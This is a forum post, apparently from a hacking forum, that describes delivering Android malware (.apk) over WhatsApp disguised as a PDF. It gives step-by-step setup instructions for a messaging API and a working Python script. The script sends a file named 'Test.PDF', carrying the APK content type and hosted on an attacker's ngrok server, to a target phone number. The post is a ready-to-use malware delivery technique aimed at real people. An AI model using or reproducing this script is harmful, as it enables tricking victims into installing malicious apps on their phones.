Tools Android (.apk) может распространяться через поддельный PDF-документ

[hacklair]

Here's a video of how it works and it's taken here, not an advertisement, I can't upload a video here.

This link is hidden for visitors. Please Log in or register now.

Malware for Android (.apk) can spread through a fake PDF document by manipulating the file extension in the WhatsApp application. Proof of Concept (PoC) is available in this repository.

Step 1:
First, create a free account on

This link is hidden for visitors. Please Log in or register now.

. We will use it to manage the API.

Step 2:
Click the "Add Instance" button and create a new instance.

Step 3:
Fill in the appropriate fields in the file `wp.py Use the generated API information and log in to your WhatsApp application using the QR code found in the instance information.

Step 4:
Enter the target number in the "enter number" field and upload your file to the server (it can be ngrok or python server. If you are testing locally, you can use XAMPP).

Step 5:
Run the Python code and watch the message being sent.

import requests
import json

url = "https://api.ultramsg.com/instance../messages/document"

payload = {
    "token": "ultramsg token",
    "to": "enter number(target number)",
    "document": "your host(ex:https://08f8-185-177-126-102.ngrok-free.app/up/test.apk.)",
    "filename": "Test.PDF",
    "content_type": "application/vnd.android.package-archive",
    "priority": "10",
    "referenceId": "",
    "msgId": "",
    "mentions": ""
}

headers = {'Content-Type': 'application/json'}

response = requests.request("POST", url, data=json.dumps(payload), headers=headers)

print(response.text)